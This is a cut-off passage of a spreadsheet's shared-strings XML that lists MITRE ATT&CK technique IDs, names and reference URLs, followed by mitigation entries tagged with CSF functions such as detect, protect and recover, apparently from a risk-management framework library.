  <si>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https://attack.mitre.org/techniques/T1110/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027</t>
  </si>
  <si>
    <t>T1556.006</t>
  </si>
  <si>
    <t>Multi-Factor Authentication</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1556/006</t>
  </si>
  <si>
    <t>T1114.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1114/002</t>
  </si>
  <si>
    <t>T1505.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1505/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1036/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/006</t>
  </si>
  <si>
    <t>T1027.014</t>
  </si>
  <si>
    <t>Polymorphic Code</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1027/014</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1201</t>
  </si>
  <si>
    <t>T1546</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546</t>
  </si>
  <si>
    <t>T1546.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/004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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1187</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1134/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1599</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1486</t>
  </si>
  <si>
    <t>T1553</t>
  </si>
  <si>
    <t>Subvert Trust Controls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</si>
  <si>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https://attack.mitre.org/techniques/T1553</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1548/004</t>
  </si>
  <si>
    <t>T1592.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1592/003</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Encrypted Channel</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</si>
  <si>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https://attack.mitre.org/techniques/T1573</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/002</t>
  </si>
  <si>
    <t>T1218.010</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/010</t>
  </si>
  <si>
    <t>T1567.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1567/003</t>
  </si>
  <si>
    <t>T1592.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1592/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1056</t>
  </si>
  <si>
    <t>T1566.004</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</si>
  <si>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
https://attack.mitre.org/techniques/T1566/004</t>
  </si>
  <si>
    <t>T1587.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1587/004</t>
  </si>
  <si>
    <t>T1593.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1593/001</t>
  </si>
  <si>
    <t>T1213.004</t>
  </si>
  <si>
    <t>Customer Relationship Management Software</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</si>
  <si>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
https://attack.mitre.org/techniques/T1213/004</t>
  </si>
  <si>
    <t>T1546.015</t>
  </si>
  <si>
    <t>Component Object Model Hijacking</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1546/015</t>
  </si>
  <si>
    <t>T1589.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1589/001</t>
  </si>
  <si>
    <t>T1195.002</t>
  </si>
  <si>
    <t>Compromise Software Supply Chain</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1195/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036/003</t>
  </si>
  <si>
    <t>T1102.002</t>
  </si>
  <si>
    <t>Bidirectional Communication</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1102/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1203</t>
  </si>
  <si>
    <t>T1595.003</t>
  </si>
  <si>
    <t>Wordlist Scanning</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1595/003</t>
  </si>
  <si>
    <t>T1562.011</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/011</t>
  </si>
  <si>
    <t>T1137.004</t>
  </si>
  <si>
    <t>Outlook Home Page</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1137/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1573/002</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1567/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1570</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1574/009</t>
  </si>
  <si>
    <t>T1608.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1608/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1037/005</t>
  </si>
  <si>
    <t>T1614.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1614/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1095</t>
  </si>
  <si>
    <t>T1027.003</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1027/003</t>
  </si>
  <si>
    <t>T1584.002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</si>
  <si>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https://attack.mitre.org/techniques/T1584/002</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Protocol or Service Impersonation</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</si>
  <si>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https://attack.mitre.org/techniques/T1001/003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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1012</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
https://attack.mitre.org/techniques/T1030</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1550/004</t>
  </si>
  <si>
    <t>T1078.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1078/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1553/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1037/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1499</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/004</t>
  </si>
  <si>
    <t>T1614</t>
  </si>
  <si>
    <t>System Location Discovery</t>
  </si>
  <si>
    <t>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
https://attack.mitre.org/techniques/T1614</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1197</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1127/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1656</t>
  </si>
  <si>
    <t>T1578.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1578/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1090/004</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>ARP Cache Poisoning</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1557/002</t>
  </si>
  <si>
    <t>T1562.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1562/008</t>
  </si>
  <si>
    <t>T1518.001</t>
  </si>
  <si>
    <t>Security Software Discovery</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</si>
  <si>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https://attack.mitre.org/techniques/T1518/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/003</t>
  </si>
  <si>
    <t>T1127.002</t>
  </si>
  <si>
    <t>ClickOnce</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</si>
  <si>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https://attack.mitre.org/techniques/T1127/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1059/006</t>
  </si>
  <si>
    <t>T1070.010</t>
  </si>
  <si>
    <t>Relocate Malware</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</si>
  <si>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https://attack.mitre.org/techniques/T1070/010</t>
  </si>
  <si>
    <t>T1591.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1591/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1132</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/010</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1598</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Resource Hijacking</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</si>
  <si>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
https://attack.mitre.org/techniques/T1496</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1585</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1588</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/002</t>
  </si>
  <si>
    <t>T1556.009</t>
  </si>
  <si>
    <t>Conditional Access Policies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</si>
  <si>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https://attack.mitre.org/techniques/T1556/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1578/002</t>
  </si>
  <si>
    <t>T1555.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1555/006</t>
  </si>
  <si>
    <t>T1213.003</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</si>
  <si>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
https://attack.mitre.org/techniques/T1213/003</t>
  </si>
  <si>
    <t>T1565.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1565/002</t>
  </si>
  <si>
    <t>T1003.008</t>
  </si>
  <si>
    <t>/etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1003/008</t>
  </si>
  <si>
    <t>T1543.001</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1543/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1569</t>
  </si>
  <si>
    <t>T1059.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/003</t>
  </si>
  <si>
    <t>T1055.009</t>
  </si>
  <si>
    <t>Proc Memory</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/009</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1650</t>
  </si>
  <si>
    <t>T1601.001</t>
  </si>
  <si>
    <t>Patch System Image</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1601/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1558/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1213</t>
  </si>
  <si>
    <t>T1070.009</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1070/009</t>
  </si>
  <si>
    <t>T1555.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1555/004</t>
  </si>
  <si>
    <t>T1036.010</t>
  </si>
  <si>
    <t>Masquerade Account Name</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1036/010</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1200</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1505</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1485</t>
  </si>
  <si>
    <t>T1132.002</t>
  </si>
  <si>
    <t>Non-Standard Encoding</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1132/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/001</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1537</t>
  </si>
  <si>
    <t>T1027.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/006</t>
  </si>
  <si>
    <t>T1556.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1556/005</t>
  </si>
  <si>
    <t>T1027.010</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1027/010</t>
  </si>
  <si>
    <t>T1070.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1070/004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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1189</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1498</t>
  </si>
  <si>
    <t>T1651</t>
  </si>
  <si>
    <t>Cloud Administration Command</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</si>
  <si>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https://attack.mitre.org/techniques/T1651</t>
  </si>
  <si>
    <t>T1546.016</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/016</t>
  </si>
  <si>
    <t>T1595.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1595/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1221</t>
  </si>
  <si>
    <t>T1037.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1037/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1134</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1111</t>
  </si>
  <si>
    <t>T1027.002</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1027/002</t>
  </si>
  <si>
    <t>T1584.007</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</si>
  <si>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https://attack.mitre.org/techniques/T1584/007</t>
  </si>
  <si>
    <t>T1071.001</t>
  </si>
  <si>
    <t>Web Protocols</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</si>
  <si>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https://attack.mitre.org/techniques/T1071/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1059/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1564/005</t>
  </si>
  <si>
    <t>T1543.002</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1543/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1563/002</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Create Account</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</si>
  <si>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
https://attack.mitre.org/techniques/T1136</t>
  </si>
  <si>
    <t>T1547.013</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/013</t>
  </si>
  <si>
    <t>T1584.004</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</si>
  <si>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
https://attack.mitre.org/techniques/T1584/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1526</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1018</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1046</t>
  </si>
  <si>
    <t>T1590.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1518</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1538</t>
  </si>
  <si>
    <t>T1055.005</t>
  </si>
  <si>
    <t>Thread Local Storage</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1622</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1036/006</t>
  </si>
  <si>
    <t>T1547.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/007</t>
  </si>
  <si>
    <t>T1608.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1608/006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1550/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1052</t>
  </si>
  <si>
    <t>T1574.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1105</t>
  </si>
  <si>
    <t>T1216.002</t>
  </si>
  <si>
    <t>SyncAppvPublishingServer</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</si>
  <si>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
https://attack.mitre.org/techniques/T1216/002</t>
  </si>
  <si>
    <t>T1098.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1098/002</t>
  </si>
  <si>
    <t>T1588.003</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</si>
  <si>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https://attack.mitre.org/techniques/T1588/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1648</t>
  </si>
  <si>
    <t>T1548.006</t>
  </si>
  <si>
    <t>TCC Manipulation</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1548/006</t>
  </si>
  <si>
    <t>T1055.008</t>
  </si>
  <si>
    <t>Ptrace System Calls</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1653</t>
  </si>
  <si>
    <t>T1027.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1027/007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/001</t>
  </si>
  <si>
    <t>T1037.001</t>
  </si>
  <si>
    <t>Logon Script (Windows)</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1037/001</t>
  </si>
  <si>
    <t>T1055.015</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1055/015</t>
  </si>
  <si>
    <t>T1665</t>
  </si>
  <si>
    <t>Hide Infrastructure</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</si>
  <si>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https://attack.mitre.org/techniques/T1665</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>Domain or Tenant Policy Modification</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</si>
  <si>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
https://attack.mitre.org/techniques/T1484</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1220</t>
  </si>
  <si>
    <t>T1596.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1596/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1578/001</t>
  </si>
  <si>
    <t>T1591.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1591/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1137/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1587</t>
  </si>
  <si>
    <t>T1003.003</t>
  </si>
  <si>
    <t>NTDS</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</si>
  <si>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https://attack.mitre.org/techniques/T1003/003</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1602/001</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1001/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1204/001</t>
  </si>
  <si>
    <t>T1550.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1550/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1569/002</t>
  </si>
  <si>
    <t>T1078.004</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1078/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1480/001</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.
https://attack.mitre.org/techniques/T1008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1558/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1003/006</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>System Time Discovery</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</si>
  <si>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https://attack.mitre.org/techniques/T1124</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1053/002</t>
  </si>
  <si>
    <t>T1055.001</t>
  </si>
  <si>
    <t>Dynamic-link Library Injection</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/001</t>
  </si>
  <si>
    <t>T1588.005</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</si>
  <si>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https://attack.mitre.org/techniques/T1588/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556</t>
  </si>
  <si>
    <t>T1546.017</t>
  </si>
  <si>
    <t>Udev Rules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</si>
  <si>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https://attack.mitre.org/techniques/T1546/017</t>
  </si>
  <si>
    <t>T1056.004</t>
  </si>
  <si>
    <t>Credential API Hooking</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1056/004</t>
  </si>
  <si>
    <t>T1495</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1495</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1490</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1546/007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1566/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1090/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1216</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1102/001</t>
  </si>
  <si>
    <t>T1001.001</t>
  </si>
  <si>
    <t>Junk Data</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1001/001</t>
  </si>
  <si>
    <t>T1598.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1598/001</t>
  </si>
  <si>
    <t>T1552.007</t>
  </si>
  <si>
    <t>Container API</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1552/007</t>
  </si>
  <si>
    <t>T1584.001</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</si>
  <si>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https://attack.mitre.org/techniques/T1584/001</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>SQL Stored Procedures</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1505/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1556/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1561/001</t>
  </si>
  <si>
    <t>T1213.005</t>
  </si>
  <si>
    <t>Messaging Applications</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</si>
  <si>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https://attack.mitre.org/techniques/T1213/005</t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1048/003</t>
  </si>
  <si>
    <t>T1574.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/004</t>
  </si>
  <si>
    <t>T1601.002</t>
  </si>
  <si>
    <t>Downgrade System Image</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1601/002</t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>Local Accounts</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1078/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1211</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1127</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1529</t>
  </si>
  <si>
    <t>T1218.014</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1218/014</t>
  </si>
  <si>
    <t>T1564.010</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564/010</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1574/012</t>
  </si>
  <si>
    <t>reference_controls</t>
  </si>
  <si>
    <t>urn:intuitem:risk:function:mitre-attack</t>
  </si>
  <si>
    <t>csf_function</t>
  </si>
  <si>
    <t>category</t>
  </si>
  <si>
    <t>M1031</t>
  </si>
  <si>
    <t>Network Intrusion Prevention</t>
  </si>
  <si>
    <t>detect</t>
  </si>
  <si>
    <t>technical</t>
  </si>
  <si>
    <t>Use intrusion detection signatures to block traffic at network boundaries.
https://attack.mitre.org/mitigations/M1031</t>
  </si>
  <si>
    <t>M1016</t>
  </si>
  <si>
    <t>Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.
https://attack.mitre.org/mitigations/M1016</t>
  </si>
  <si>
    <t>M1035</t>
  </si>
  <si>
    <t>Limit Access to Resource Over Network</t>
  </si>
  <si>
    <t>protect</t>
  </si>
  <si>
    <t>Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
https://attack.mitre.org/mitigations/M1035</t>
  </si>
  <si>
    <t>M1029</t>
  </si>
  <si>
    <t>Remote Data Storage</t>
  </si>
  <si>
    <t>Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.
https://attack.mitre.org/mitigations/M1029</t>
  </si>
  <si>
    <t>M1037</t>
  </si>
  <si>
    <t>Filter Network Traffic</t>
  </si>
  <si>
    <t>Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
https://attack.mitre.org/mitigations/M1037</t>
  </si>
  <si>
    <t>M1021</t>
  </si>
  <si>
    <t>Restrict Web-Based Content</t>
  </si>
  <si>
    <t>Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.
https://attack.mitre.org/mitigations/M1021</t>
  </si>
  <si>
    <t>M1033</t>
  </si>
  <si>
    <t>Limit Software Installation</t>
  </si>
  <si>
    <t>Block users or groups from installing unapproved software.
https://attack.mitre.org/mitigations/M1033</t>
  </si>
  <si>
    <t>M1013</t>
  </si>
  <si>
    <t>Application Developer Guidance</t>
  </si>
  <si>
    <t>govern</t>
  </si>
  <si>
    <t>This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
https://attack.mitre.org/mitigations/M1013</t>
  </si>
  <si>
    <t>M1034</t>
  </si>
  <si>
    <t>Limit Hardware Installation</t>
  </si>
  <si>
    <t>Block users or groups from installing or using unapproved hardware on systems, including USB devices.
https://attack.mitre.org/mitigations/M1034</t>
  </si>
  <si>
    <t>M1017</t>
  </si>
  <si>
    <t>User Training</t>
  </si>
  <si>
    <t>Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
https://attack.mitre.org/mitigations/M1017</t>
  </si>
  <si>
    <t>M1052</t>
  </si>
  <si>
    <t>User Account Control</t>
  </si>
  <si>
    <t>Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.
https://attack.mitre.org/mitigations/M1052</t>
  </si>
  <si>
    <t>M1028</t>
  </si>
  <si>
    <t>Operating System Configuration</t>
  </si>
  <si>
    <t>Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.
https://attack.mitre.org/mitigations/M1028</t>
  </si>
  <si>
    <t>M1053</t>
  </si>
  <si>
    <t>Data Backup</t>
  </si>
  <si>
    <t>recover</t>
  </si>
  <si>
    <t>Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.
https://attack.mitre.org/mitigations/M1053</t>
  </si>
  <si>
    <t>M1038</t>
  </si>
  <si>
    <t>Execution Prevention</t>
  </si>
  <si>
